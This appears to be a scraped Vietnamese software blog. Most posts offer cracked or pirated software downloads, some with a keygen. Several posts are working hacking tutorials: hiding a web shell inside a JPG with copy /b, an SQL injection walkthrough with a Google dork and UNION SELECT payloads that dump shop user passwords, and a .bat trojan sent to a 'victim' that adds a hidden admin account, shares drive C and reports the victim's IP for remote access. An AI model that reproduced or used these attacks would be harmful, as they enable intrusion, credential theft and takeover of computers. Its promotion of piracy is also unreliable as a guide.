PS: để tránh tình trạng một số người nhảy vào bình luận theo kiểu, "sao không giỏi làm như BKIS blah blah blah", tôi nói trước là không làm không có nghĩa là tôi không có quyền nói, đặc biệt là nói đúng.

ĐỌC THÊM !!!!

Wi-Fi Defense 1.0.21.0 Labels: Security, Softwares | 0 comments

SpyderSoft Wi-Fi Defense(TM) was designed with the mainstream, non-technical consumer in mind, yet is powerful enough to offer security benefits to even the most advanced user.

The technology detects all devices on the network, provides identifying information to assist the owner in designating each as Friend or Foe, and seamlessly locks-down the network to allow only approved devices. Adding a new device or allowing a visitor to join the network is also an easy task, and the application ensures that you maintain a locked-down network. At all times, SpyderSoft Wi-Fi Defense(TM) continues a background scan to detect new and/or unauthorized devices.

Info:
* PC running Windows 2000 or XP
* 400 MHz processor
* 128 MB RAM
* 10 MB free disk space on your hard drive
* Network card
* LAN or WLAN (Wi-Fi) network

Download :

http://www.mediafire.com/?qjj2gteuwvc

ĐỌC THÊM !!!!

ĐỌC THÊM !!!!

This logo design software will help you to design professional logo image for printing or the Web in minutes! Choose one of 100+ pre-made logo templates as a start point for your logo project or create a blank logo project and make your own logo from scratch. AAA Logo has it's own vector-based logo objects library with more then 2000 customizable logo elements. Exactly the same technique to create logo images using pre-designed logo elements is used by almost all professional logo designers to create logos for their clients.

Create Your Own Unique Logos in Minutes:

1. Download and install AAA Logo - logo design software. Click Here
2. Choose logo template from library or start a blank logo
3. Add new logo objects, customize/replace objects from template
4. Customize colors and effects
5. Adjust overall logo colors
6. Export you new logo for the Web or printing

Retail Version:

Code:

http://rapidshare.com/files/118248380/a.log.2008.v2.0.rar

Or

Code:

http://rapidshare.com/files/118670949/AAA.Logo.2008.2.0.sh.rar.html

ĐỌC THÊM !!!!

GOM Media Player 2.1.9.3754 Labels: Softwares | 0 comments

GOM Player is a free multimedia player with popular video and audio codecs built-in. GOM Player supports file formats such as AVI, DAT, MPEG, DivX, XviD, WMV, ASF. Users don't have to install codecs separately. GOM Player is capable of playing incomplete or damaged AVI files by skipping the damaged frames. It can also play locked or partially downloaded files. Its other features include drag-and-drop support, HTTP streaming, editable skins, subtitling, overlay mixer, key remapping, enhanced filter rendering, real-time index rebuilding for AVI files and unicode support among others.
Version 2.1.9.3754 fixes UI bug for Preferences window.

Download : http://www.mediafire.com/?bgzndnyfj4m

ĐỌC THÊM !!!!

ĐỌC THÊM !!!!

ĐỌC THÊM !!!!

Give your digital music files more vibrancy with DFX® Audio Enhancer. DFX enhances your music listening experience by improving the sound quality of MP3, Windows Media, Internet radio and other music files. With DFX you can transform the sound of your PC into that of an expensive stereo system placed in a perfectly designed listening environment. Renew stereo depth, boost your audio levels and produce a deep, rich bass sound.

DFX Audio Enhancement Features:
- Advanced DSP Sound Enhancement Effects
- Speakers and Headphones Optimization
- Finely-tuned, Customizable Music Presets
- Dynamic Sound Spectrum Analyzer
- Powerful Audio Processing Modes
- Stylish, Shapely Skins
- Space Saving Mini-mode Interface
- 5.1/7.1 Surround Sound Support

DFX dramatically improves your digital audio experience with:
- 3D Surround Sound - Immerse yourself inside the music
- Stereo Ambience - renew lost stereo depth High Fidelity Restoration
- Dynamic Gain Boosting - pump up the volume
- Headphones Optimization - Hear more pleasant, natural sounds with headphones
- Customizable Music Presets - Select finely-tuned settings for many styles of music

- 3D Surround Sound.
Using the 3D Surround Sound component adds amazing depth and body to your audio, compensating for monitoring limitations and sonic losses due to data compression. With 3D Surround processing the sounds will surround you, virtually putting you inside the music! 3D Surround enhances the sound played on conventional 2-speaker systems and makes even small PC speaker systems sound larger and richer. It is also fully compatible with Surround Sound playback systems.

- HyperBass.
Using the HyperBass component adds deep, rich bass sound to your audio by compensating for the bass limitations of almost all PC-based audio systems and data-compressed audio formats. DFX does this by carefully regenerating the low frequency harmonics, thus increasing the perceived bass, but without exceeding the speakers physical limits, adding or changing speakers or amplifiers, and without increased power consumption. HyperBass greatly improves the bass performance of any sound system.

New and improved features in DFX 8:
- Improved sound enhancement processing including full 5.1 and 7.1 Surround Sound support
- Enhanced stylish interface
- New vertical mini-mode which nicely integrates with media players
- Smart player snapping and auto-minimize
- Informative audio status display

Home page

Download DFX Audio Enhancer 8.0 for Windows Media Player

Download DFX Audio Enhancer 8.0 for RealPlayer

Download full Pack DFX Audio Enhancer 8.405 - 11.27 MB:

RapidShare

ĐỌC THÊM !!!!

ĐỌC THÊM !!!!

ĐỌC THÊM !!!!

Learn more about network protocols, hosts, ports and packets with network monitoring tools - "professional Look at Net", portable network monitoring utility for Microsoft Windows 2000/XP/2003 OS.

Portable features (run on flash-drive) possible only registered version. The Network scanning don't required network administrator privilege, only host administrator right require for silent scanning and IP packets capturing. IP packets filtering on IP addresses, ports, outgoings, incomings and more. Possible auto save 500, 2000 or 5000 capturing packets, with viewing saved and capturing packets in ASCII and HEX (hexadecimal) mode. Also possible viewed any other (no packets) source in HEX mode. Utility don't need third-party library such as WinPCap.

Download :

http://rapidshare.com/files/121965921/Professional_Look_at_Net_2.0.3.rar
http://depositfiles.com/files/5948324

ĐỌC THÊM !!!!

webcamXP PRO 5.2.5.798 Labels: Softwares | 0 comments

webcamXP PRO 5.2.5.798-biến webcam thành những máy quay phim chuyên nghiệp

This is our brand new webcamXP 5 project. It has a simpler interface, provides better performances, includes additional features and is now replacing webcamXP 2008 which was quite heavy for most systems.

webcamXP 5 has been specially designed for Vista and it also works on Windows XP, 2003 and 2008 Server.

In order to match the requirements for everyone it can be executed in 3 modes (Normal, IP Camera optimized and Windows Media).

Administrator rights are no longer required to setup and run the application and a service version is planned for this summer.

The package includes the IP Camera DirectShow filter and webcamXP Mobile for PocketPC, all you need in less than 3Mb

Download:

Code:

http://www.mediafire.com/?nwyddazn9b1

ĐỌC THÊM !!!!

We're Back A Dinosaurs story

A Dinosaur Adventure For The Whole Family!

In this Steven Spielberg production lavish animation and imagination bring to life this delightful tale of dinosaurs in New York City.

A group of very friendly, very intelligent dinosaurs take a trip to Manhattan and brighten the lives of two very special, lonely children.

Part 1:
Part 2:
Part 3:
Part 4:
Part 5:
Part 6:
Part 7:
Part 8:
Part 9:
Part 10:

You will love this movie !

Watch out that building, man ! ~~~

^^

ĐỌC THÊM !!!!

The Easter Egg Adventure 2004

The idyllic Egg Town is the location for this Easter Egg Adventure, which sees the beautiful location under threat from some dastardly thieves. Making off with the collection of Easter Egg's the town has managed to collate, it's up to some brave residents to retrieve them from the evil doers. A wonderfully touching children's tale, Easter Egg Adventure is a heartwarming seasonal story.

Part 1:
Part 2:
Part 3:
Part 4:
Part 5:
Part 6:
Part 7:
Part 8:

This movie pictures seems old, but, that doesn't matter !
This is a GOOD MOVIE for KIDS :D

ĐỌC THÊM !!!!

Imdb.com rating: 6.2 out of 10
File Size: 700mb

Plot:
Ben Crandall, an alien-obsessed kid, dreams one night of a circuit board. Drawing out the circuit, he and his friends Wolfgang and Darren set it up, and discover they have been given the basis for a starship. Setting off in the ThunderRoad, as they name their ship, they find the aliens Ben hopes they would find... but are they what they seem? ^^!

Download Now:

Part 1
Part 2
Part 3
Part 4
Part 5
Part 6
Part 7
Part 8

^^!

ĐỌC THÊM !!!!

Auslogics Visual Styler 3.1.15.145 Labels: Softwares | 0 comments

A useful, interesting, easy and fun way to re-vamp your desktop appearance

Windows desktop can be boring with its standard icons, blue welcome screen and lack lustre choice of display themes. Now you can give your PC a digital makeover and add your personal touch.

Visual Styler is a useful, interesting, easy and fun way to re-vamp your desktop appearance. Glossy, metallic, shiny or funky plastic looks for your PC desktop are possible, plus a great variety of icon packs, wallpapers, logon screens and visual styles which you can quickly install on your computer.

Redesign your PC desktop and give it your personal touch!

Here are some key features of "Auslogics Visual Styler":

Change Icons:
· You can replace about 80 system icons, including "Desktop", "My Computer" or even icons for WinZip, Microsoft Word or Microsoft Excel files;
· The program contains a powerful Package Editor, where you can create your own icon collections and even distribute them over the Internet; · You can change the icon of any file and any folder, including items in the Start menu and the Favorites;

Unleash Visual Effects:
· Change the size and spacing of desktop icons and even remove the small arrow next to each icon;
· Show Windows version on the computer desktop and change wallpaper position;
· Change font smoothing, menu animation and enable smooth list scrolling;

Change Wallpaper:
· A simpler, faster way to change desktop wallpaper;
· Support for wallpaper packs, which can be downloaded from the Internet;
· Desktop wallpaper can be changed automatically each time you switch on your computer;

More XP Themes:
· Visual Styler will let you download and use thousands of XP themes from the Internet. Glossy, metallic, shiny or plastic looks for your PC desktop are just a few mouse clicks away;
· Unlike other programs, Visual Styler does not require any additional software and doesn't change any system files, so it's absolutely safe to use it;
· Many file formats are supported, just download the theme you like from the Internet - Visual Styler will set it up for you;

Boot and Logon Screens:
· With Visual Styler you can now change logon and boot screens - no more Windows logo when you switch on your computer, you can select what you want to see on the screen;
· Many logon screen and boot screen formats are supported - just download them from the Internet and Visual Styler will be able to use them;
· You will be able to see a small preview for every logon and boot screen you have installed

Download :

http://www.mediafire.com/?fqmjqfjnzdg

ĐỌC THÊM !!!!

Link download :

Quote:

http://www.mediafire.com/?hwyj2do1gms

ĐỌC THÊM !!!!

Cái này StuN lấy cái shop của anh siêu gà hồi lúc lâu thiệt lâu share ..

Method : web based tool

Download : http://www.mediafire.com/?dymmjmb0txl
Mirror : http://www.mediafire.com/?8fru9ct5mjr

ĐỌC THÊM !!!!

1.-Cần 2 files. 1 file bạn cần giấu ( shell đỉnh ) và một cái ảnh jpg .Nặng nhẹ cỡ nào cũng by_pass được hết .

Nếu muốn nhiều files thì zip nó lại nhá .

2.-Tạo một folder trong ổ C:\ rồi chuyển hết vào

3.-CMD một phát, vào C:\ đánh cd

4.-Đánh copy /b (tên_ảnh).jpg + (tên_con_shell).(định_dạng) (tên_của_hỗn_hợp_mới_làm).jpg

5.-Giờ thì muốn làm gì thì cứ làm

ĐỌC THÊM !!!!

Tìm trên Google : ==> allinurl:"shopdisplayproducts.asp?id="
Nếu không thích thì cứ thay id = cat

================================================== ================================

*** ==> Lỗi Mic Jet hay tương tự <== ***

vd:
-------------------------------------------------------
Microsoft JET Database Engine error '80040e14'

Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '3'%' and hide=0 order by specialoffer desc,cname'.

/shop$db.asp, line 325
-------------------------------------------------------

Search account:
%20union%20%20select%201%20from%20tbluser"having%2 01=1--sp_password
đánh số vào
vd:

Quote:

%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password
%20union%20%20select%201,2%20from%20tbluser"having%201=1--sp_password
%20union%20%20select%201,2,3%20from%20tbluser"having%201=1--sp_password

Làm miết cho tới khi nó hiện lên cái abgnr tỏng đó có mấy con số lẻ tẻ...

-->khai thac:
fldusername%2b'/'%2bfldpassword
Bỏ vào cái số tương ứng xuất hiện trên màn hình

Tìm link admin :
http://www.xxx.com/shop/shopdisplayproducts.asp?id=27%20union%20%20select% 201,2%20from%20configuration%27

-->Code khai thác ::
fieldname%2b%27/%27%2bfieldvalue

Nếu không thích thì có thể mò link admin :
Một số link admin thong dụng :

Quote:

shopadmin.asp
shopadmin1.asp
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp

Sau đây là các số liên quan đến các line.. link này dòm ở chỗ dòng inject là sẽ thấy hết

Quote:

line 559 -> 92
line 60->54
line 503 -> 48
line 868 -> 37
line 467 -> 47
line 468 -> 47
line 191 -> 56
line 184 -> 47,43,53
line 191 -> 48
line 211 -> 43
line 187 -> 43
line 59 -> 70
line 930->37
line 191=>56,48
line 188=>53,56,60
line 185=>86,43
line 202=>84,91
line 208=>48,57
line 64 =>53
line 58=>43
line 424 => 44,45
line 482 => 47
line 325 => 43
line 465 => 43,47
line 965 => 41
line 505 => 68,48
line 503 => 48,45,51
line 912 --> 37
line 861 -== > 34
link 833 : == > 35
line 961 = > 37
line 871 ==> 34
line 465 ==> 47
line 466 ==> 47
line 191 -->> 56
line 184 -->> 47,43,53
line 188 -->> 53,56, 60
line 191 -->> 48
line 185 -->> 86,43
line 202 -->> 84,91
line 208 -->> 48,57
line 64 -->> 53
line 62--->>37
line 67--->>48,53
line 211 -->> 43
line 59 -->> 70
line 58 -->> 37,43,57
line 60 -->>47,48,49 ,53,50,56,60,85
line 57 -->> 37,38,58
line 916 -->>>37
line 930 --->>37
line 476-->>>47
line 47-->>30
line 912---->>37
line 61--->>53
line 53---->>34,35
line 468 ------> 47
line 469 -------> 48
line 191 -- 56
line 184 -- 47,43,53
line 188 -- 53,56
line 191 -- 48
line 185 -- 86,43
line 202 -- 84,91
line 208 -- 48,57
line 64 -- 53
line 211,187 -- 43
line 59 -- 70
line 467 ----->47
line 465-----47
line 468 ------> 47
line 469 -------> 48
line 876-->>43

BÀI NÀY STUN TỰ BIÊN TỰ DIỄN NÊN HƠI NGẮN GỌN XÍU... AI KHÔNG HIỂU THÌ CŨNG KHÔNG TRÁCH

ĐỌC THÊM !!!!

Tool chỗ này :
http://www.mediafire.com/?jjosl2sl1jy

* Do trước khi quay mình quên chưa chỉnh chất lượng phim nên hơi dõm

Link download : http://www.mediafire.com/?u4vbwyodwrf
Link Mirror : http://www.mediafire.com/?rtxwtywzxtk

ĐỌC THÊM !!!!

Chưa thử nghiệm kĩ lắm nhưng kết quả đạt được cũng hết sức kinh ngạc

1/ -> CMD
2/ Nhập lệnh : net
Rồi xong nó sẽ ra một đống như thế này :
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

3/ Ok !
Trong bài này là ta chỉ việc xài đến 3 lệnh dễ ẹt này thôi :
+ net user
+ net share
+ net send

- Chúng ta sẽ sử dụng mấy cái lệnh này trong 1 file .bat đó nhe
? > File .bat là file mà windows sẽ thực thi như là lệnh )" class="inlineimg" />

4/ Mở Notepad ra:
Đánh vào :

dir
pause

5/ Ok ! Bây giờ save nó lại thành
test.bat

>> Chạy

---------------------- Bắt đầu nhá -------------------
-:Server:-
Kế hoạch ở đây là tiến hành share ổ C mà tạo một user mới với quyền Truy cập Admin.

Bước 1 -> Mở cả CMD và Notepad
Cái CMD sẽ giúp kiểm tra mấy cái lệnh,
còn cái notepad dùng để làm cái file .bat

*Lệnh n 1-> net user StuN /add

> Tạo một user mới. Ở đây là StuN

*Lệnh n 2-> net localgroup administrators StuN /add

> Lệnh này sẽ làm thằng user chạy ngay vào khu Admin.

Tùy thuộc vào thằng windows mà tên của nhóm Admin sẽ kahcs nhau.
Nếu ta đánh ở Mỹ thì tên nhóm Admin là : Administrators

*Lệnh n 3->net share system=C:\ /unlimited

Lệnh này dùng để chia sẻ ổ C:\ với cái tên của system.)" class="inlineimg" />

Đó là 3 cái lệnh để bỏ vào file .bat

> Xong rồi thì gửi cho thằng victim

-!Kinh nghiệm nâng cao!-

*Lệnh n 4-> net send urip I am ur server

urip là ip của máy mình
Và khi victim nó mở file .bat đó, nó sẽ gửi một tin nhắn tới máy của mình và mình sẽ biết được ip của victim

-----------------------: Cuối cùng :----------------
Bây giờ là lúc thằng victim đã mở cái file .bat và có một admin mới lập trong máy nó.

Bây giờ ta remote computer nhá ( CMD )

Lệnh n 1 -> net use \\victimip StuN

>>> Remote Computer
victimip là điền IP của Victim

Lệnh n 2-> explorer \\victimip\system

>>>Cái này sẽ mở cái windows explorer trong máy victim.

Sau cùng thì muốn làm gì thì làm

ĐỌC THÊM !!!!

download :

http://www.mediafire.com/?2c11umd9stx

ĐỌC THÊM !!!!

Download Windows Defender 1.1.1593 Labels: Security | 0 comments

Download Windows Defender 1.1.1593
Microsoft Windows Defender (formally known as Windows AntiSpyware) is a security technology that helps protect Windows users from spyware and other potentially unwanted software. Known spyware on your PC can be detected and removed.

This helps reduce negative effects caused by spyware, including slow PC performance, annoying pop-up ads, unwanted changes to Internet settings, and unauthorized use of your private information. Continuous protection improves Internet browsing safety by guarding more than 50 ways spyware can enter your PC.

Download :

http://www.mediafire.com/?tyjn1l2yt10

ĐỌC THÊM !!!!

Vista Manager is a system utility that helps you to optimize and tweak, clean up your Windows Vista. It will increase you system speed, improve system security and suit your idea!

Vista Manager Features:
Information
Optimizer
Cleaner
Customization
Security
Network
Misc. Utilities

Download + Keygen

ĐỌC THÊM !!!!

Photodex ProShow Producer 3.2.2047 Labels: Softwares | 0 comments

The all-new ProShow Producer 3.0 allows you to create advanced, professional-grade presentation masterpieces that not only emotionalize and inspire audiences but bring them to the point of sale.

With an award-winning feature set including unlimited photo/ video layering, show templates, branding, copy protection and built-in media authoring, plus all-new creative features like masking, vignetting and motion keyframing, the only limit to your success is your imagination.

ProShow Producer 3.0 Feature Overview

Layers

Add an unlimited number of layers to any slide.
Drag and drop to easily add content to a show.
Supports 100+ file types.
Transparency support for PSD, PNG, TIFF and GIF files.
New! Turn any layer into a fully-customized mask to conceal or reveal aspects of underlying layers.
New! Add a gradient or solid color as a slide layer to a layer to get incredible results.
Spice up a presentation using interactive slide actions to launch PDFs, spreadsheets, webpages and more.
New! Set transition effects for individual layers.

Editing

Optimize your workflow using built-in image correction tools like sharpen, colorize, saturate and more.
New! Create enhanced borders for your photos and videos with ProShow Producer's all-new vignette effect.
New! Create Hollywood-Style greenscreen effects with the all-new Chroma Key Transparency tool.
Specify opacity for any layer on a slide.
New! Add depth to your composition by adjusting the color and opacity of a shadow on any layer in a slide.
New! Crop and rotate your photos and videos with precision.
New! Use the red-eye removal tool to correct any photo in your show in seconds.

Effects

New! Use Adjustment Effects to produce spectacular effects like…make a video move through color shifts or create a sequence of photo fades.
New! Add multiple keyframes to each adjustment effect.

Motion

Add motion like pan, zoom and rotate to any layer on a slide for a cinematic effect.
New! Zoom X and Y coordinates for a layer individually and zoom out further than ever before.
New! Create complex motion paths by setting multiple keyframe points on the keyframe timeline.
New! The fully-customizable slide preview grid allows you to accurately position your photos and videos on a slide.

Captions

Control the font, size and color of captions in your slides.
New! Use caption keyframing to create multiple caption motion effects on a single slide.
New! Animate your captions with more amazing effects to choose from than ever before.
Add interactive captions to launch custom actions like Pause, Resume, Next Slide, Previous Slide, Write Email and many more.
New! Gain greater design control over captions with ProShow Producer's new caption styles, caption line spacing and caption character features.

Music and Sounds

Enhance any slide show by dropping in any MP3 or WAV audio file.
Save an audio track directly from a CD and drop it right into your slide show.
Crop your audio and set fades using the built-in Audio Trimmer.
New! Built-in soundtrack waveform in slide list.

Backgrounds

New! Add interest to your slide shows with solid colors, gradients, or videos as backgrounds.
New! Use the new, built-in backgrounds to spruce-up your slide shows.
Control the adjustment levels of your background content.

ProShow Prodcuer 3.0 Output Formats

DVD (with PC playback)
VCD (with PC playback)
Autorun CD
Self-contained EXE
Share shows via email
Streaming web shows
Free online show sharing
New! Streaming Flash video
New! Compressed AVI
New! Uncompressed AVI
New! Quicktime video
New! High definition video (HD)
New! Windows Media Video (WMV)
MPEG 1 and 2
Screensavers

Productivity

Use slide show templates to boost productivity.
ProShow Producer provides native support for RAW files from digital cameras.
Use ProShow Producer's Projects mode to streamline workflow.
New! ProShow Producer's refreshed user interface includes a soundtrack waveform, a new slide options dialog and a favorites pane.
New! Get a close-up view of your work with a click of the mouse using the new Full Screen View.
New! Recover moved or misplaced files from a show easily with the new Find Missing Files feature.
New! Take complete control over show timing with the new timeline view.

Business Oriented Features

New! Capture Frames feature allows you to output Jpeg files of each slide for printing.
Watermark all the slides in your show, with one click.
Include your personal branding information and logo on PC shows and DVD menus to promote your business.
Copy Protect CDs and EXE slide shows from unauthorized copying

ProShow Producer 3.0 New Features.

Composition

Masking- Turn any layer into a fully-customized mask to conceal or reveal aspects of underlying layers using this all-new advanced, professional photo editing feature. By controlling the alpha and color channels of the layer you designate as a mask, you can create sophisticated silhouette effects, abstract multi-layered compositions and more!
Vignettes- Create polished-looking borders with soft-feathered edges or defined shapes for your photos and videos using ProShow Producer's all-new vignette effect. Simply choose the softness, size, shape and transparency of your custom border.
Enhanced Layer Options- Now you can add gradients or solid colors as independent slide layers to build depth and add additional visual interest to your compositions!
Layer Transitions- Use the Keyframing controls to add transitions to each individual layer on a slide.
New Built-In Content- ProShow Producer 3.0 now comes with professional-grade background images and videos. Simply browse the selection that is provided with the software installation disc and add the content you like to your slide shows.
Enhanced Custom Backgrounds- Add interest to your slide shows with all-new gradients as backgrounds.
Slide Preview Grid- The new, fully-customizable slide preview grid in ProShow Producer 3.0 allows you to accurately position your photos and videos on a slide. Snap layers to the grid for precise positioning.
Unlimited Layers Per Slide- Now you can add an unlimited number of photo and video layers to each slide in ProShow Producer 3.0. With unlimited layers, the sky's the limit on what you can express in your slide show.

Adjustment Effects/ Editing

Adjustment Effects- ProShow Producer 3.0 breaks free from the previous limitation of having photo/video adjustments such as opacity, brightness and hue remain constant for the duration of a slide. With all-new adjustment effects, you can produce spectacular effects like…make a video move through color shifts (ex. Wizard of Oz - "horse of a different color" style) or create a sequence of photo fades, all of which can occur during the course of one slide!
Chroma Key Transparency- Create Hollywood-Style greenscreen effects with the all-new Chroma Key Transparency tool in ProShow Producer 3.0. Quickly make a specific color range in your image transparent to create overlays, graphic art effects and more.
Enhanced Drop Shadow and Outline Options- Add depth to your composition by adjusting the color and opacity of a shadow on any layer in a slide. Apply customized outline borders of any color and size to enhance your photos and videos for a clean, professional look.
Crop and Rotate Photos- With ProShow Producer 3.0 you can quickly crop and rotate any layer with precision. Optimize the composition of your photo and video content in a snap with these new time-saving built-in tools.
Red-Eye Removal- Easily fix those distracting red-eye photos with ProShow Producer 3.0. Use the red-eye removal tool to correct any photo in your show in seconds

.
Moton Effects

Motion Keyframing- Blow your audience away by adding complex motion sequences (typically found in movies and high-end commercials) to your shows using this all-new, highly versatile motion tool. Using motion keyframing, you can create any combination of effects like…make photos and videos zoom in, then zoom out, rotate, fly off the page AND return to the page seconds later, all over the course of one slide!
Enhanced Zooming Control- Enhanced zooming in ProShow Producer 3.0 lets you zoom X and Y coordinates independently for any layer to achieve interesting warp-like effects. With enhanced zooming control, you can also zoom out further than ever before.

Caption Control

Caption Textures- For professional results, use gradients and textures to further enhance your captions, transforming your message into a design element in your show.
Increased Caption Formatting Control- Gain greater typographic control over captions and maintain better style consistency with ProShow Producer's new caption styles, caption line spacing and caption character features.
Caption Motion Keyframing- ProShow Producer's all-new caption motion tool lets you control each caption's motion style, motion path and timing using keyframing. Create simple or advanced text effects featuring rotation, skewing and more, all with precise timing control.
Enhanced Caption Effects- Animate your captions with more fun and amazing effects to choose from than ever before. New caption effects include Galactic Scroll, Curling, Zoom Out, and Wag Opacity.

Workflow and Settings Control

Hot Folder/ Live Show Support- Need your slide show in real-time? ProShow Producer 3.0 allows you to create live slide shows with the new Hot Folder/ Live Show Support feature. Shoot photos and watch them come to life in a slide show instantly!
Copy Settings- Eliminate the process of duplicating laborious, multi-step effects and settings configurations. Just right click and use ProShow Producer 3.0's new copy-settings feature to instantly copy all settings used on a layer or an entire slide-then, apply the settings to your desired target with a single click.
Slide Timeline- Take complete control over show timing with the new timeline view in ProShow Producer 3.0. Toggle between the normal Slide List view and Timeline view to precisely sync your audio to certain scenes in your slide show.
New Waveform Bar- View your audio file's waveform in the Soundtrack bar with ProShow Producer 3.0. This makes it easy to determine at a glance where your songs begin and end.
Full Screen View- This all-new feature is indispensable for any professional who wishes to achieve maximum precision and control over positioning elements within a show. Get a detailed, close-up view of your work with a click of the mouse.
Find Missing Files- Recover moved or misplaced files from a show easily with the new Find Missing Files feature in ProShow Producer 3.0.
Specify Transition Effects- Take control of your transition effects. ProShow Producer 3.0 lets YOU decide what effects are used when randomizing transitions.
Capture Frames- The new Capture Frames feature allows you to output Jpeg files of your slides for printing.
Startup Tutorial- Beat the learning curve with ProShow Producer's startup tutorial. Quickly learn the basic steps of creating your first slide show.
Slide Actions- Spice up a presentation using slide actions to control custom navigation in your slide show OR launch supplemental materials such as documents, applications, and websites at the end of any slide. Actions include: Go to Next Slide, Previous Slide, Pause, Resume, Run Program, Open URL and more.

Enhanced Playback and Output Options

New Video Output Formats- Expanded output options in ProShow Producer 3.0 give you more flexibility in the ways you share your slide shows. Output to compressed AVI, Windows Media Video (WMV), HD Video and Quicktime. Specify custom video compression settings to optimize file sizes for the web.
Flash Output- Create a Flash movie or commercial for the web in seconds. No Flash experience required! Simply create your show, choose from either Flash video (FLV) and let ProShow Producer 3.0 do the rest of the work for you.
Widescreen Menus- ProShow Producer now supports widescreen menus for your slide shows. Create a professional 16:9 Hollywood-style menu to go along with your widescreen show.

Changes in Version 3.2.2047, December 3, 2007:

* Added "Exit" action for objects and captions in menus
* Added option to save audio tracks in MP3 format
* Fixed problem where certain audio files could not be added to slides
* Fixed sync problem that could affect Flash output

Download :

http://www.mediafire.com/?1yxm9ylcnnt

ĐỌC THÊM !!!!

pass : free4v.net
Download :

http://mega.1280.com/folder/0D4Y76/

ĐỌC THÊM !!!!

Ashampoo Firewall Pro v1.14

Big protection power. Small system load -- Better Protection, More Powerful Features

Ashampoo FireWall PRO is like a trusty watchdog standing guard at the entrance to your property. It is always alert and checks everything going in and out of your computer, keeping out unwanted intruders and preventing unauthorized access to the Internet from your computer. And despite its impressive power it is so simple to use – in Easy Mode you just click and go for full protection.

Additional features in Ashampoo FireWall PRO
All the following functions and features are only available in the Pro version of Ashampoo FireWall.
:: Compact, efficient and easy to use
Just like the free version, Ashampoo FireWall PRO is a very small program that goes easy on your system resources. Despite its impressive power, it uses so little memory and processor time that you’ll never notice it’s there. The Configuration Assistant guides you through every step of the simple setup process. And if you’re a novice Easy Mode makes using it a breeze – just click and go for full protection. More experienced users can switch to Expert Mode to get full control over the program’s many powerful features.
:: Six additional tools
In addition to solid firewall protection, Ashampoo FireWall PRO comes with six additional tools that can significantly increase your security and make your online life easier.

Features at a glance

-= Features and tools: =-
> Heavy-duty firewall protection: Monitors all your computer’s network activity and provides strong protection on both incoming and outgoing connections.
> Easy Mode: Get full protection in seconds with Easy Mode and the Configuration Assistant. No expert knowledge required.
> Expert Mode: Experienced users can activate this mode for powerful additional capabilities.
> Simple and compact: Self-explanatory user interface, uses minimum memory and resources.
> Learning Mode: Automatically identifies programs that try to make connections and lets you decide whether you want to allow them. Click and go protection in Easy Mode or full configuration options in Expert Mode.
> Rules: Create rules for every program to control how they can access the network. One-click operation in Easy Mode or full configuration and the ability to define complex rules in Expert Mode.
> Child protection: Control your children’s access to the Internet and the sites that they can view.
> Traffic volume limiting: For volume-based accounts. Monitors your online traffic and warns you or closes the connection when you reach your limit.
> Block All: One-click panic button for emergencies that lets you block all traffic, for example if you are under attack or suspect that a malicious program is active.
> AutoStart Manager: Identify and disable unwanted auto-starting programs. Finds these programs in all the locations where they can be hidden.
> System Processes Monitor: Check running processes and stop them if necessary. Allows you to display all processes, only system processes or only non-system processes.
> Internet Cleaner: Delete all traces of your surfing activity. Includes support for multiple browsers.
> File Wiper: Permanently delete files and folders so that they can never be recovered.
> IP Spam Blocker: Stop annoying popup spam on your desktop.
> Internet Accelerator: Analyzes and optimizes your Internet connection.
> Online Updates: Updates to increase protection performance and security can be downloaded and installed from within the program with a couple of clicks.

-= Technology highlights for the experts: =-
> Monitor local connections: Ashampoo FireWall PRO can also monitor the local connections used inside your computer. Useful for identifying suspicious activity. Can be enabled or disabled.
> Monitor LAN connections: Monitor all the local LAN traffic into and out of your computer. Can be enabled or disabled.
> Stealth ports and port scan blocking: Makes your computer invisible and actively prevents port scans, even on open ports that you are using for communication.
> Connection log: Detailed logging of all internal, LAN and Internet connections with date, time, application, port used and IP address.
> Real-time connection analysis: Direct access to the information normally only available with NetStat, with live updating and configurable update intervals.
> Communications statistics: Full data on your communications settings and statistics, also with live updating and configurable updating intervals.

Download :

http://www.box.net/shared/634vmnaas4

ĐỌC THÊM !!!!

1) Enabling Email Headers
Enabling Email Headers cho Gmail
làm theo như trong hình

click vô more option

click típ Show Original

sau đó sẽ có 1 popup mở ra

Enabling Email Headers cho Hotmail
click vào option như trong pic

click vào Mail Display Settings

Ở dòng Message Headers thay đổi thành Full và click OK

giờ xem bức thư của bạn ở inbox đi

Enabling Email Headers cho Yahoo
click option

chọn General Preferences

ở Headers chọn all

giờ vào inbox coi kết quả

2) Email Headers là gì ?

trên là ví dụ 1 bức thư dc truyền đi
dòng đầu tiên là khách hàng của email từ mail.exampleuniversity.edu

đoạn header sau đuợc thêm khi mail.exampleuniversity.edu truyền thông báo tới mail.exampleisp.com

đoạn header sau đuợc thêm khi mail đuợc lưu trên server

đoạn header sau dc thêm khi người dùng tải thư về

3)Tìm người gửi
ở đây là ta tìm địa chỉ IP của người gửi từ đó xác định dc họ ở đâu

sau khi tìm đuợc IP
ta có thể vô đây để search http://www.arin.net/index.shtml

sau đó tìm OrgAbuseEmail
Enjoy

ĐỌC THÊM !!!!

Lock My PC™ is an easy in use, powerful and compact tool to lock your computer from unauthorized use. When you leave your computer unattended, the program disables the hot keys (including Ctrl+Alt+Del), mouse, locks CD/DVD ROM doors and displays a lock screen. Nobody can access your system without providing the correct unlock password.

Unlike another similar computer lock software that cannot lock Ctrl+Alt+Del on a computer running Windows XP, our Lock My PC runs own keyboard driver to block such key combinations. Moreover, bulletproof startup lock guarantee that when your computer locaked at startup, this lock cannot be bypassed even in safe mode!

You don't like snoopers. They are always prying into your e-mail messages, programs, data, files, etc. Lock My PC allows you to lock your computer with a password while you leave it unattended. You can lock your computer manually, with a menu or hotkey, or set up auto lock when your computer is idle.

Lock My PC (logo and trayicon menu)

Quick and safe computer lock by hot key, or mouse click
Autolock when computer is idle
Correct Ctrl+Alt+Del lock
Bulletproof startup lock (couldn't be bypassed in safe mode)
Different installation mode - setup for home or corporate use
CD/DVD-ROM doors lock
Multi-user support
Multimonitor support
Auto turnoff when computer is locked for a long time
Blind password option
Stealth mode
Windows XP x64 compatibility
Custom lock screens
Cycling lock screen images
